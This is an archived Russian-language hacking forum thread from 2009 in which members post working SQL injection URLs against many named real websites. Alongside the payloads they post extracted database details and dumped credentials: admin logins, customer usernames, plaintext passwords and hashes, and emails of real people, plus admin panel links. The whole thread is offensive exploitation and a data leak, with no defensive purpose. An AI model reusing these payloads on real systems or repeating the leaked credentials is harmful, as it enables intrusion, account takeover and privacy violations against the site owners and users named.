SQL Инъекции [Архив] - Страница 32

z00MAN

10.02.2009, 22:18

http://www.fondazionelibro.it/manifestazioni.php?id=-10+union+select+1,2,3,concat(user(),0x3a,database( ),0x3a,version()),5,6,7,8,9,10--
user(): fondazionelibro@localhost
database(): fondazionelibro
version(): 5.0.32-Debian_7etch8-log

http://www.lazerklinika.ru/?module=publications&id=-10+union+select+1,2,concat(user(),0x3a,version(),0 x3a,database()),4,5,6,7--
user(): kolesni2_root@localhost
database(): kolesni2_db
version(): 4.0.27-log

Agenzia Fiorentina per l'Energia
http://www.firenzenergia.it/primopiano.php?id=-10+union+select+1,concat(version(),0x3a,database() ,0x3a,user()),3,4,5,6,7,8--
user(): Sql125363@62.149.141.86
database(): Sql125363_1
version(): 5.0.68-log

таблица phorum_users
http://www.firenzenergia.it/primopiano.php?id=-10+union+select+1,concat(user_id,0x3a,username,0x3 a,password),3,4,5,6,7,8+from+phorum_users+limit+0, 1--
user_id:username:рassword
1:root:8a6043643c9681a1f6422ea094103431
2:Francesco Rondoni:fc12e5d66f9d4213ad6b5e2be1c6e2a7
3:Massimo Pepe:c098ff62d9071d69697b5048c6c1c653
4:Tiziano:e4dc459dd55759e17f5095169c77fadb

интернет-магазин спорт товаров
http://sport-tovari.ru/texts/int.php?id=-10+union+select+1,concat(user(),0x3a,version(),0x3 a,database())--
user(): u10475@10.10.153.191
database(): u10475
version(): 5.0.67-log
тИЦ:110

таблица clients
http://sport-tovari.ru/texts/int.php?id=-10+union+select+1,concat(clientusername,0x3a,clien tpassword)+from+clients+limit+0,1--
clientusername:clientpassword
samolet:bowling
sport:tovary
sub7even:gbpltw

Gorev

10.02.2009, 22:25

http://romanicriss.org/continut_.php?id=-252+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCA T_WS(0x3a,Version(),Database(),User()),0x71),0x71) ,4,5,6,7,8,9,10,11,12,13,14&lang=

Database Version: 5.0.67-community
Database name: criss_cr1ss
User name: criss_r0man1@localhost

http://romanicriss.org/admin/login.php

username: aurel19
password: unixunix@@

faza02

11.02.2009, 00:01

http://www.cultivarnet.com.br/two.php?flag=informe&id=-13+union+select+1,version(),3,4/*

5.0.41--log

faza02

11.02.2009, 00:37

http://www.atreve-te.pt/inspira-te.php?id=-5+union+select+1,version(),3,4,5,6--

5.0.67-community-log

http://www.sandrosen.se/te.php?action=prod&id=-101121'+union+select+version(),2/*

5.0.45-community-nt

http://www.limousin.se/bonlimousin/sidor/linjer/ko.php?id=2092&sid=1&lid=-6+union+select+version()/*

5.0.32-Debian_7etch8-log

http://www.andhrakaburlu.com/gs.php?id=-92+union+select+1,version(),3,4,5,6/*

5.0.24a-log

http://www.pjxjz.com/xs.php?id=-140+union+select+1,version()/*

5.0.27-community-nt

http://www.cplec.com/xs.php?id=-32+union+select+1,version()--

5.0.27-community-nt

0nThaR

11.02.2009, 01:36

http://www.empoweredproducts.com/product_one.php?id=-5+union+select+1,2,3,concat(version(),0x3a,databas e(),0x3a,user())/*
5.0.45:gunoil_db:empow@localhost

z00MAN

11.02.2009, 12:16

V.O.I.A.C. Victims of Illegal Alien Crime
http://www.voiac.org/victims.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,concat(version (),0x3a,user(),0x3a,database()),45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62--

user(): db35080@64.13.192.17
version(): db35080_voiac
database(): 4.1.25-Debian_mt1

Faith and Reason®
http://www.faithandreason.org/seminars.php?id=-11+union+select+1,2,concat(convert(version()+using +binary),0x3a,convert(user()+using+binary),0x3a,co nvert(database()+using+binary)),4,5--

user(): lounge@localhost
version(): lounge
database(): 4.1.14
PR=4

Assembler

11.02.2009, 14:22

http://history.referama.ru/txt.php?str=1&srch=&ch=-3707%20union%20select%201,2,3,group_concat(table_n ame),5,6,7,8%20from%20information_schema.tables--

ТЫц тыц =) ( у меня творческий кризис ))

Gorev

11.02.2009, 14:42

http://www.obiectivdevaslui.ro/advertising.php?page=1&categories_id=-5+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11/*

Version: 4.1.22-standard-log
Database : irina11_obiectiv2008
User : irina11_obiectiv@localhost

Assembler

11.02.2009, 14:52

http://www.kachnu.ru/txt.php?str=1&srch=&ch=-54%20union%20select%201,2,3,4,group_concat(table_n ame),6,7,8,9%20from%20information_schema.tables--

5.0.32-Debian_7etch6-log

Gorev

11.02.2009, 18:52

http://www.berta-art.com/news_details.php?lng=ro&page=&news_id=-5+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11&bertaAdminID=lfabj75f5tpli7bas74nqtj7onbukfso

Version : 5.0.51a
Database : berta_art_db
User : berta_art_user@localhost

z00MAN

11.02.2009, 19:55

United Way Of Pioneer Valley
http://www.uwpv.org/?id=-11+union+select+concat(version(),0x3a,database(),0 x3a,user())--
user(): gounited@localhost
database(): unitedbs
version(): 4.1.20

PR=5

Bigg Boss 2 Official Site, Watch BiggBoss2 on Colors TV Daily at 10
http://www.biggboss2.in.com/contestants.php?id=-11+union+select+1,concat(user(),0x3a,database(),0x 3a,version()),3,4,5/*
вывод в title
user(): buzz18@172.29.11.1
database(): eon18tech2
version(): 5.0.45-log

PR=5

f1ng3r

11.02.2009, 20:30

http://www.aktas.lt/news/news_open.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(), user(),database()),5,6--

Database Version : 4.0.27-standard
Database name : aktas_duombaze
User name : aktas@localhost

faza02

11.02.2009, 22:42

http://www.angelhitomi.com/bbs/mex.php?id=-48+union+select+1,2,version(),4,5,6,7,8,9,10/*

4.1.22-standard-log

PR: 4

Gorev

11.02.2009, 22:49

http://produsesiservicii.profitromania.ro/modul/?id_compan=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7/*

Version : 5.0.32-DEBIAN_7ETCH8-LOG
Database : PROFIT
User : PROFIT@LOCALHOST

AkyHa_MaTaTa

11.02.2009, 23:01

www.incubator.tsu.ru PageRank: 3 тИЦ: 4700
http://www.incubator.tsu.ru/contest/?org=3+union+select+1,2,3,4,5,6,7,8,9,group_concat (concat_ws(0x3A,username,user_password)+SEPARATOR+ 0x3c62723e),11+from+incubator_tsu_ru.phpbb_users+w here+user_level=1--
админка форума:
http://www.incubator.tsu.ru/forum/admin/index.php
-------------------------------------------------------------------------
gwru.ru PageRank: 5 тИЦ: 500

http://gwru.ru/world/base?id=-2378+union+select+1,concat_ws(0x3A,user(),@@versio n,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24--

pinky07

11.02.2009, 23:18

www.rmz-kazan.ru

третья версия MySQL
http://www.rmz-kazan.ru/?page=5'+and+substring(version(),1,1)='3

юзер:
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),1,1))='114 r
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),2,1))='109 m
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),3,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),4,1))='95 _
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),5,1))='107 k
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),6,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),7,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),8,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),9,1))='110 n
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),10,1))='64 @
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),11,1))='108 l
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),12,1))='111 o
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),13,1))='99 c
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),14,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),15,1))='108 l
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),16,1))='104 h
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),17,1))='111 o
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),18,1))='115 s
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),19,1))='116 t

БД:
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),1,1))='114 r
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),2,1))='109 m
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),3,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),4,1))='95 _
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),5,1))='107 k
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),6,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),7,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),8,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),9,1))='110 n
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),10,1))='0

f1ng3r

12.02.2009, 02:42

Мобильный портал, а также магазин сотовых телефонов. PR - 4

http://www.o-connect.com/index.php?type=news&id=-1+union+select+concat_ ws(0x3a,version (),user(),database())--

Database Version : 5.0.45
Database name : oconn_oconnectdb
User name : oconn_oconect@localhost

хватаем узеров :
http://www.o-connect.com/index.php?type=news&id=-1+union+select+ concat_ws(0x3a,Username,Password)+from +tblendusers+limit+0,1--

их около 1500 тысячи, пассы не захешированы ))

-m0rgan-

12.02.2009, 03:59

http://www.hackleyhme.com/health.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password), 4+from+Admin--
логин/пасс:
hme2003:w1nt3r

AkyHa_MaTaTa

12.02.2009, 05:26

Даешь аниме нахаляву

http://animefilm.biz/lib_object_view.php?o=-150'+union+select+concat_ws(0x3A,user(),version(), database()),2,3,4,5,6,7,8,9,10/*

spherics

12.02.2009, 06:47

http://www.pocketmac.com/product.php?id=309809777809+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30--

Database Version: 5.0.54-log
Database name: pocketmacsite
User name: websitead@67.199.10.22

Админы

http://www.pocketmac.com/product.php?id=309809777809+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(userid ,0x3a,password)+FROM+pocketmacsite.admin+LIMIT+0,1 ),0x3a),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--

userid:password

: admin : billy34b
: shekhar : newdelhi
: anne : paloma20

http://www.fazed.org/video/view/?id=380998767+union+select+1,2,3,concat_ws(0x3a,ve rsion(),user(),database()),5,6,7,8,9,10,11,12--

Database Version: 5.0.67-community-log
Database name: fazed
User name: root@localhost

http://www.fazed.org/video/view/?id=380998767+union+select+1,2,3,concat_ws(0x3a,us er,password),5,6,7,8,9,10,11,12+from+mysql.user+li mit+0,1--

root : *49D31C9CB8CACAC3832DCA30E2A09DD4F0A7E236

http://www.teses.eu/?id=38098770976+union+select+1,concat_ws(0x3a,vers ion(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17--

Version:4.1.10-standard-log
User:gazela_teses@localhost
Database:gazela_teses

http://www.ufcw1776.org/page.php?id=3890809877908+union+select+concat_ws(0 x3a,version(),user(),database()),2,3,4--

Database Version: 5.0.26-standard-log
Database name: ufcw1776_org
User name: ufcw2@localhost

http://www.musgrave.ie/aboutusa.php?id=37%20or%201=@@version--

Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86) Apr 14 2006 01:12:25 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1

http://www.musgrave.ie/aboutusa.php?id=37%20or%201=(select%20system_user)--

musgravew3

http://www.musgrave.ie/aboutusa.php?id=37%20or%201=(select%20db_name())--

musgrave.ie

http://en.pasen.it/product_detail.php?id=637987987698+union+select+1, concat_ws(0x3a,version(),user(),database()),3,4,5, 6,7,8,9--

Version:5.0.32-Debian_7etch8-log
User:cutefact_admin@localhost
Database:pasen

http://en.pasen.it/product_detail.php?id=637987987698+union+select+1, concat_ws(0x3a,user,password),3,4,5,6,7,8,9+from+m ysql.user+limit+0,1--

root: *3E3ACE7EDB1397754856E421374855C2B32DAA7C
vftp: *8DC54F2E15823C98AEA063E339A5D4C53D1A471A
debian-sys-maint: *BA2FFA1BFAD117D74877D6C5F238406F678F87E8
cutefact_admin: *DEDA5FF13D1EAC8D04D2F5473D2FC9B26853A8B1
syscp: *DEDA5FF13D1EAC8D04D2F5473D2FC9B26853A8B1

http://www.freevstfx.com/free_vst_fx.php?id=79887379876+union+select+1,2,3, concat_ws(0x3a,version(),user(),database()),5,6,7, 8,9,10--

Version:5.0.44-log
User:freevstf@localhost
Database:freevstf

Боенги Боенги Боенги -)

http://www.747sp.com/newsdetail.asp?id=3798798698567+union+select+1,con cat_ws(0x3a,version(),user(),database()),3,4,5,6,7 ,8,9--

Version:4.0.27-max-log
User:Crew747sp@64.202.163.35
Database:Crew747sp

Kraneg

12.02.2009, 15:37

images.ourontario.ca - PR4

http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=@@version--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2
http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=(SELECT+system_user)--
User: OntarioImagesRead
http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=(SELECT+db_name())--
CurrentDB: OntarioImages

spherics

12.02.2009, 17:44

Ребята забираем еще один крупный проект.В общем продажа софта и игр под MAC итд

Читалка хорошо работает в общем воть -)

http://www.freeverse.com/games/game/?id=3666709767809809+union+select+1,2,3,concat_ws( 0x3a,version(),user(),database()),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61, 62,63,64,65,66,67,68,69,70,71,72,73--

Database Version: 5.0.45-log
Database name: webstore
User name: store@localhost

/Volumes/ContentHD/sites/fvsite/games/game/index.php

http://www.freeverse.com/games/game/?id=3666709767809809+union+select+1,2,3,concat_ws( 0x3a,user,password),5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49, 50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 ,67,68,69,70,71,72,73+from+mysql.user--

root : *382D915D57801D0868AC4A297D89D2E9A35BC63C
gsreader : 10d4c3fb48035600 хэш MySQL : 10d4c3fb48035600 : ahoyhoy
faq : 0fd091c1001b43cb
gsutility : 6d2082810da205a0
gsutility : 30e551d74aed5fad
gsutility : 6d2082810da205a0
mark : 7fa96784501c6d0b
randy : 77eb75a607a7c821
remy : 46b27126746b1141
backup : 606706156665cd86 хэш MySQL : 606706156665cd86:x
mt : *E09333E4221CB5EE5AB01170795377729CB5A146
bhproje_freevers : 6d8369a953851a24 хэш MySQL : 6d8369a953851a24 : monkey
ian : 4d9ff7ac381304d7

bruce : 6d3d1ca975eb70e2
mantis : 0128fa7460afd575
fvreg : 5892ad7204422e2e
hip : 6d3d1ca975eb70e2
justind : 005746604607a15a
cento : 49150a2950a14a25
dave : 6d35f8b12448dddc
brian : *8142E238D0E55344D43071D46CB971C502DD9395
sudoku : 0da5e2fb69f306c9
store : 509cafb91a21d6f9
mint : 0e41167f3411dfe9 хэш MySQL : 0e41167f3411dfe9 : delicious
liz : 7f8e913d229ded36 хэш MySQL : 7f8e913d229ded36 : callico
macfun : 08961af77a9bde4d
macfun_zen : 19bbd9cb1fe53a7b
marktest : 389d6ae97d0fb1c0
cento : 49150a2950a14a25
kevin : 7ab1fc6a1e1a8a44
statsmith : 029552ba79e3f778
bc : 6d2082810da205a0
store : *175B91F9A0B308D93247563A5E0B7B922927AD9F
horling : 1203ae656937fcb4
root : 072bc9bb579ed0ff

http://www.aeromobile.net/news.asp?ID=380980976067+union+select+1,concat_ws( 0x3a,version(),user(),database()),3,4,5,6,7,8--

Database Version: 5.0.22-community-nt
Database name: aeromobile
User name: aeromobileadmin@localhost

http://www.aeromobile.net/news.asp?ID=380980976067+UNION+SELECT+1,AES_DECRYP T(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(USERNAME, 0x3a,PASSWORD)+FROM+aeromobile.users+LIMIT+1,1),0x 3a),0x71),0x71),3,4,5,6,7,8--

: martin : 2mm
: alex : CovertClose

Gorev

12.02.2009, 17:57

http://www.ponturi.ro/subcat.php?idc=-9+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5/*&ids=1&mod_afisare=2

Database Version: 5.0.27
Database name: ponturi
User name: ponturi@89.37.121.161

f1ng3r

12.02.2009, 19:56

http://www.poveche.net/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database (),user())--

Database Version : 4.0.27-log
Database name : bcaf
User name : poveche@localhost

http://www.paragon-bg.com/news.php?id=-1+union+select+1,2,concat_ws(0x3a,version (), database(),user()),4,5,6--

Database Version : 5.0.32-Debian_7etch8-log
Database name : metasoft_paragon
User name : paragon@localhost

берем узверей:

http://www.paragon-bg.com/news.php?id=-1+union+select+1,2,concat _ws(0x3a,username,pswrd,email),4,5,6 +from+clients+limit+1,1--

берем админа:

http://www.paragon-bg.com/news.php?id=-1+union+select+1,2,concat _ ws(0x3a,username,pswrd,privilegel),4,5,6 +from+clients+limit+0,1--

Gorev

12.02.2009, 21:10

http://www.clip-trade.ro/store/view.php?prod=4010063&brid=-2+UNION+SELECT+1,CONCAT_WS(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39/*

Version : 4.1.22-standard
Database : cliptra_store
User: cliptra_store@localhost

faza02

12.02.2009, 23:01

http://www.paramountcenter.org/screen.php?id=-323+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16--

5.0.67-log

PR: 5

z00MAN

12.02.2009, 23:05

SuperADSL
http://adsl.superonline.com/modem_detail.php?id=-11'+union+select+1,2,concat(user(),0x3a,database() ,0x3a,version()),4,5,6,7,8/*
user(): superadsl@212.252.113.115
database(): superadsl
version(): 5.0.41-log 4

PR=5

table: user
поля: id:ad:username:sifre:durum

table: users
поля: Id:u_status:so_anket:so_anket_log:so_anket_request

http://www.stellenlinks.ch/link.php?id=-11'+union+select+1,2,3,4,5,concat(user(),0x3a,data base(),0x3a,version()),7,8,9,10/*
user(): web788@localhost
database(): usr_web788_1
version(): 5.0.45

PR=6

Gorev

12.02.2009, 23:07

http://www.marinarii.ro/nave-de-istorie.php?id=-5+UNION+SELECT+1,2,concat_ws(0x3a,version(),databa se(),user())--&name=Bricul_Mircea_

Database Version: 5.0.67-community-log
Database name: marinari_marinarii
User name: marinari_db@localhost

faza02

12.02.2009, 23:48

http://www.corazonhealth.co.uk/screen.php?id=-3+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,73),73),3,4,5/*

4.1.11
вывод во флеш о_О

pinky07

13.02.2009, 00:31

www.tabsheaven.net довольно известный в сети сайт с гитарной табулатурой)

http://www.tabsheaven.net/tab.php?id=-41872'+union+select+1,2,3,concat_ws(0x3a,version() ,user(),database()),5,6,7,8,9,10,11,12+--+
юзер - gh123400@localhost
бд - gh123401db, gh123400db
версия MySQL - 5.0.22

таблицы из бд gh123400db:
Links
Messages
MinipollAnswers
MinipollQuestions
News
Tabs
textinterprets
texttabs
таблицы из бд gh123401db:
DiscussionTopics
Interprets
Links
Messages
MinipollAnswers
MinipollQuestions
News
Tabs
textinterprets
texttabs

Kraneg

13.02.2009, 00:34

drivermagazine.ca - PR3
http://drivermagazine.ca/phpcode/web/view_article.php?art_id=-401+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26--

DB_Ver : 4.1.22-standard
DB_User: driverma_driver@localhost
DB : driverma_dm

База данных юзеров:member
Интересные поля: email,password
Запрос для примера:
http://drivermagazine.ca/phpcode/web/view_article.php?art_id=-401+UNION+SELECT+1,2,3,concat_ws(0x3a,email,passwo rd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26+from+members+limit+0,1--

Войти можно тут:
http://www.drivermagazine.ca/phpcode/web/sub.php

Gorev

13.02.2009, 00:45

http://neuron.md/catalog.php?param_ctid=20738&param_sctid=-20741+union+select+null,null,to_char(user)+from+sy s.dual--

user : WEBNEURON

http://neuron.md/catalog.php?param_ctid=20738&param_sctid=-20741+union+select+null,null,TABLE_NAME+from+SYS.A LL_TABLES+WHERE++ROWNUM+%3C=+5--

крутите....:)

http://neuron.md/catalog.php?param_ctid=20738&param_sctid=-20741+union+select+null,null,chr(207)||chr(240)||c hr(232)||chr(226)||chr(229)||chr(242)||chr(32)||ch r(226)||chr(241)||chr(229)||chr(236)||chr(32)||chr (238)||chr(242)||chr(32)||chr(195)||chr(238)||chr( 240)||chr(229)||chr(226)||chr(224)||chr(32)||chr(3 3)||chr(33)||chr(33)+from+dual--

Улыбнитесь :)

Kraneg

13.02.2009, 01:23

improvemyhome.ca - PR5
http://www.improvemyhome.ca/article_detail_page.php?art_id=254149&type=-2222+UNION+SELECT+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6/*

DB_Ver : 5.0.41-log
DB_User : snapsync@localhost (имеет файловые привилегии, читать файлы по крайней мере точно может)
DB : renovons_ag

Пользователи из mysql.user
root:745ae3fb13dd6c1a
root:358b5bdd4c573f2d
root:358b5bdd4c573f2d
snapsync:0285e4f0029d984d
backup:4906447b2de0dc5d

R1dex

13.02.2009, 03:15

Художественная Галерея «Виктория»

http://gallery-victoria.ru/painters'+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0--+/

sabe

13.02.2009, 07:08

Europesolidaire.eu
http://www.europesolidaire.eu/article.php?article_id=-179+union+select+concat_ws(0x3a,0x3a3a,email_user, password_user,gecos_user)+from+user_table+limit+1, 1#

Mainbrace.com.au
http://www.mainbrace.com.au/print.php?page=article.php&id=-12+union+select+1,version(),3,4,5,6,7,8/*

Thestartbusiness.com
http://thestartbusiness.com/links/browse.php?id=7+union+select+concat_ws(0x3a,userna me,password)+from+admin
есть табла админ с сообтетсвующими паролями

Kraneg

13.02.2009, 09:51

options.bc.ca - PR4
http://www.options.bc.ca/program_info.php?cat_id=10&program_id=23000%27+UNION+SELECT+1,concat_ws(0x3a, version(),user(),database()),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17/*
DB_Ver : 4.1.22-standard
DB_User : options_db@localhost
DB : options_db1

cornerstoneacademy.bc.ca - PR4
http://www.cornerstoneacademy.bc.ca/certification.php?cat_id=7&cert_id=24+UNION+SELECT+1,2,concat_ws(0x3a,version (),user(),database()),4,5,6,7,8,9,10/*
DB_Ver : 5.0.27
DB_Ver : cornerstone@localhost
DB : cornerstone

Gorev

13.02.2009, 12:59

http://www.autotrafic.ro/vanzari/anunt1750+AND+ASCII(SUBSTRING((select+concat_ws(0x 3a,version(),user(),database()) ),4,1))=46-- /Vand_Porsche_924.html

Version: 5.0.51a-3ubuntu5.1
Database : autotraficv2
User : autotrafic@localhost

2 Jokester- sorry

spherics

13.02.2009, 15:09

Еще один крупный проект -)

PageRank = 7

http://www.ocg.at/zertifikate/tc_suche_detail.php?id=1809809765440+union+select+ 1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68--

http://www.ecdl.at/service/tc_suche_detail.php?id=1609470970809+union+select+ 1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68--

Database Version: 5.0.45-log
Database name: ecdl
User name: ecdldb@ACA80012.ipt.aol.com

Пользователи

http://www.ocg.at/zertifikate/tc_suche_detail.php?id=1809809765440+UNION+SELECT+ 1,CONCAT(0x3a,(SELECT+CONCAT(username,0x3a,passwor d,0x3a,email)+FROM+ecdl.ecdl_person+LIMIT+0,1),0x3 a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55,56,57,58,59,60,61,62,63,64,65,66,67,68--

username : password : emai

: Manfred.Wolfslast.1959-08-12: web1206at : office@viennagroup.at
: Alexander.Kappel.1974-04-12: 19ilvy74 : a.kappel@bfi-burgenland.at
: Markus.Krojer.1980-10-20 : 474021 :
: Michael.Krojer.1974-05-13: nokia74 : michael@krojer.at
: KARL.SCHUH.1950-11-01 : 994868 :

И так пол лимона -)

Администраторы

http://www.ocg.at/zertifikate/tc_suche_detail.php?id=1809809765440+UNION+SELECT+ 1,CONCAT(0x3a,(SELECT+CONCAT(id,0x3a,username,0x3a ,password)+FROM+ecdl.ecdl_administrator+LIMIT+1,1) ,0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68--

id : username : password

:38: daniela : 08puesmk*
:3: resch : gcoldcexj901
:28: livia : barca123
:37: karin : kImqiTUc
:27: rupert : vanhalen1966
:26: Malgorzata : mis1919
:21: kilian : schwechat02
:24: manuela : chicco202
:23: angelika : 1812dominik
:20: lancelot : Stiegl
:19: andreas : alaemmer

plutus

13.02.2009, 16:56

http://www.ire x.md/viewdetale.php?id=-4+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--&lang=eng
4.1.22

http://www.hq class.md/company/index.php?f=-14796+union+select+1,2,3,4,table_name,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+information_schema.tables+limi t+83,1--&l=ru&ses=prodserv&viewps=5437
83 tablits

versia 5

попугай

13.02.2009, 17:14

http://www.phc.gov.pk/newsshow.php?id=99+union+select+1,2,3,concat_ws(0x 3a,user(),database(),version(),login,password),5,6 +from+sadmin--

phcdb@72.51.46.233:phc:5.0.51a-community-log:2:0:phcphc:23f043c45f949381613ba2dd167891b4

23f043c45f949381613ba2dd167891b4 = passhealth789

А админку не нашел((

Assembler

13.02.2009, 17:35

http://www.agriminternational.com/acc.php?lang=1&id=-6%20union%20select%20concat_ws(0x3a,user,pass)%20f rom%20admin--

Админка

http://www.agriminternational.com/admin
Имя пасс Admin: admin

z00MAN

13.02.2009, 18:13

Welcome to the Jameson Dublin International Film Festival
http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(vers ion(),0x3a,database(),0x3a,user()),4,5,6,7/*
user(): IFFUSR@LOCALHOST
database(): DUBLINIFF_COM
version(): 5.0.27

PR=5
тИЦ=10

table test_admin:
http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(id,0 x3a,username,0x3a,password),4,5,6,7+from+test_admi n/*
1:ADMIN:ADMINPWD1

table mcc004_user:
http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(id,0 x3a,user_login,0x3a,user_pass),4,5,6,7+from+mcc004 _wp_users/*
1:ADMIN:$P$BWSEILDVQWFDR4VRWWLPQRYW3PCKEI.
2:ANDREW KENNEDY:$P$BXXUBZWP6V9NXGJFXCSR5F2RL5WRQG1

админка:
http://www.jdiff.com/admin/login.php

OSAS Stallion Auction
http://www.osasauction.com/item.php?id=-3+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--

вывод в title

user(): peimatin_auct3@localhost
database(): peimatin_auct3
version(): 5.0.75-community-log

table PHPAUCTIONXL_adminusers:
porchak:832d376cb74fb47ed113debe9b5f24d9

table PHPAUCTIONXL_users:
1:jayport:bf6a89d3935ceb0ed798149d2ac967ed
2:auctionstaff:bf6a89d3935ceb0ed798149d2ac967ed
3:colt12:3e1f9e1da3b65fa102d3a6589bf409b6
4:Breeder:4160c64318079c955543d5a14ea3a27b
5:stefbo:bcea5fde6a21c943838b2d5a1784a2e4
6:chanthor:cda8b830510c5c1d0e55f8e147c374a7
7:jamesinc:c1a9eed41e121557ead9156201421d41

админка:
http://www.osasauction.com/admin/

Ocean City Golf - Golf Packages
http://www.ocgolf.com/packages/packagers.php?id=-13'+union+select+concat(user(),0x3a,database(),0x3 a,version())/*

user(): golf@localhost
database(): golfdb
version(): 4.0.24-standard-log

PR=5
тИЦ=10

з.ы интересная sql inj ;)

Assembler

